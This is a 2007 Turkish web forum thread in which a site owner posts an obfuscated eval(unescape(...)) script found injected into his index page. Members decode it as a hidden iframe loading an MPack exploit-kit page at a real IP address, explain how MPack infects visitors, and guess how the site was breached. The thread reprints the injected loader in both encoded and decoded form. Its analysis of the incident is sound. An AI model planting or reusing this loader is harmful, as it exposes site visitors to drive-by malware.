Ceviz Forum

Geri Dön   Ceviz Forum > Programlama > Javascript / DHTML / Ajax

Cevapla
 
LinkBack Seçenekler
Eski 15/08/2007, 10:52   #1 (permalink)
Cevizci
 
msk1977 Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 02/2006
Mesaj: 253
Varsayılan anlamsız bir script

Kod:
<script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script>
bu nedir sabah sitemin index sayfasında buldum tabi site açmıyordu
msk1977 hatta değil   Alıntı Yaparak Yanıtla
Eski 15/08/2007, 11:34   #2 (permalink)
Üye
 
Virtuozzo Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 03/2007
Yer: İstanbul
Mesaj: 534
Varsayılan

Şifrelenmiş bir kod.
Muhtemelen ya başka siteye yönlendirmek, program yükletmek ya da popup vs. için kullanılan bir koddur.
Kodları sitenden kaldırman yararına olacaktır.
__________________
http://gupse.org
Virtuozzo hatta değil   Alıntı Yaparak Yanıtla
Eski 15/08/2007, 11:37   #3 (permalink)
Cevizci
 
ajnglagla Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 11/2004
Yer: Shanghai, Çin
Mesaj: 385
Varsayılan

domainvalet banerlarından kurtulun gibi bir sayfada rastlamıştım bu tür bi koda
__________________
- [ www.gulhangulez.com ] -
ajnglagla hatta değil   Alıntı Yaparak Yanıtla
Eski 15/08/2007, 11:39   #4 (permalink)
Ceviz Yiyerek Büyüyoruz
 
asker Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 01/2005
Yer: istanbul
Mesaj: 748
Varsayılan

O kodun sayfanda senden habersiz ne işi var?
Biri index dosyasına ulaşıyor olmasın?
asker hatta değil   Alıntı Yaparak Yanıtla
Eski 16/08/2007, 00:55   #5 (permalink)
Cevizci
 
msk1977 Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 02/2006
Mesaj: 253
Varsayılan

index atma dedikleri böyle birşeymi acaba hiç haberim yok sabah bir baktım bu kodlar var sayfadaki kodların yarısıda yok
msk1977 hatta değil   Alıntı Yaparak Yanıtla
Eski 16/08/2007, 10:48   #6 (permalink)
Üye
 
Virtuozzo Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 03/2007
Yer: İstanbul
Mesaj: 534
Varsayılan

Index atma dedikleri tam anlamıyla bu değil.
Index atıldığında sizin index yani giriş sayfanız devredışı bırakılır ve saldırganın kendi hazırladığı sayfa giriş sayfası yapılır.
Bu sizin giriş sayfanıza ekstra kod ekleme işlemidir.
Genelde ziyaretçinin bilgisayarına mIRC, trojan vs. yükletmek için kullanılan bir yöntemdir.
Sitenizin ve sunucunuzun güvenliğini gözden geçirmeniz yararınıza olacaktır.
__________________
http://gupse.org
Virtuozzo hatta değil   Alıntı Yaparak Yanıtla
Eski 16/08/2007, 12:43   #7 (permalink)
İptal Durumu
 
Üyelik Tarihi: 04/2007
Yer: Bilecik
Mesaj: 679
Varsayılan

kodun anlamlı hali şudur:

PHP Kodu:
document.write("<iframe src=\"http://81.95.150.82/mpack/index.php\" width=0  height=0 style=\"display:none\">"); window.status=" "
mTuran hatta değil   Alıntı Yaparak Yanıtla
Eski 16/08/2007, 14:31   #8 (permalink)
Üye
 
tankado Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 05/2006
Mesaj: 58
Varsayılan

MPack hakkında kısa bir açıklama yapayım.

Aynen yukarıda olduğu gibi iframe ile (sizin durumunuzda muhtemelen sql inkection ile sayfaya dahil edilmiş) sayfaya dahil ediliyor. JS kodu ile tarayıcının tipi ve sürümü belirlendikten sonra, ilgili tarayıcı için geçerli olan exploitleri bir ajanı yüklümek için deniyor ve başarılı olursa bilgisayar zombiye dünüşüyor.

2006 sının sonunda 3 kişilik bir rus ekibin başlattığı bir proje, kodu ve güncellemelerini e-gold üzerinden para karşılığı satıyorlar. Şubat ayında mevcut açıkları kullanarak 100K üzerinde keylogger (tuş kaydedici) yükledikten sonra rapor edilmiş. Web attacker adında bir muadili de var. Aslındada WA daha eski.
tankado hatta değil   Alıntı Yaparak Yanıtla
Eski 16/08/2007, 18:21   #9 (permalink)
Tembel Coder
 
Meteryus Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 03/2004
Mesaj: 1,504
Varsayılan

Alıntı:
sizin durumunuzda muhtemelen sql inkection ile sayfaya dahil edilmiş
kodlar sitenin index dosyasında göründüğüne göre sql injection olma ihtimali pek yok , saldırgan dosyalara erişim için bir yol bulmuş olmalı, doğru ayarlanmamış yazma yetkileri buna sebep olmuş olabilir.
__________________
meteryus.com // yakında yeniden
Meteryus hatta değil   Alıntı Yaparak Yanıtla
Eski 16/08/2007, 19:27   #10 (permalink)
Kodlarım, Canlarım...
 
cemaliozan Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 05/2005
Yer: » Delphi Bölümü «
Mesaj: 1,677
Varsayılan

Alıntı:
Meteryus, mesajından alıntı: Mesajı Gör
kodlar sitenin index dosyasında göründüğüne göre sql injection olma ihtimali pek yok , saldırgan dosyalara erişim için bir yol bulmuş olmalı, doğru ayarlanmamış yazma yetkileri buna sebep olmuş olabilir.
yada lisanssız kullanılan eklentilerde sebep olabilir... Hazır forumlar gibi....Bu tür eklentiler kendi lisans bilgilerini kontrol edip sunucuda belirli dosyalara exploit ekleyebilirler.
__________________
Haberbox | Tek Sevgi | Genel Seçimler | Magice Book | Yerel Seçimler
Yaşamaya Değer Bir Hayattan, Sevmeye Değer Bir Aşktan, Dostluğa Değer Bir Arkadaşlıktan Asla Vazgeçmeyin...
cemaliozan hatta değil   Alıntı Yaparak Yanıtla
Cevapla

Bookmarks

Seçenekler

Mesaj Yazma Hakları
Yeni mesajgöndermezsiniz
Cevap yazamazsınız
Dosya ekleyemezsiniz
Mesajınızı düzenleyemezsiniz

BB code is Açık
[IMG] kodu Açık
HTML kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık

Benzer Konular
Konu Konuyu açana göre Forum Cevap En Son Mesaj
ilk okul mezunu programcı ferdi04 Genel Programlama 152 03/10/2007 19:55


Forum saati Türkiye saatine göredir. GMT +3. Şu anda saat 10:42.

Reklamlar & Desteklenenler
Hassas Valf | Hassas Kaplama | Antalyamız | Gazete | Ticari Bilişim | Hakan Müştak | Rüya Tabirleri | Kadın | Hastalıklar | Cepte msn ve e-posta | Webmaster | Antalya Aupair | Turkish Property Antalya | Forum | Chat | Perde | Adsl | Araba | bolindir.com | guncelle.com | livescore | Web Tasarım | evden eve nakliyat | forum | evden eve | sohbet | Resimcim| Kalifiye İnsan Kaynakları | Web Tasarım | Oyun | Yusuf KOÇ | Akın Yorulmaz | şiir | UFO | Web Tasarım | Oyunlar | Canlı Tv |


Forum Yazılımı: vBulletin Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0
Copyright ©2001 - 2008, Ceviz.net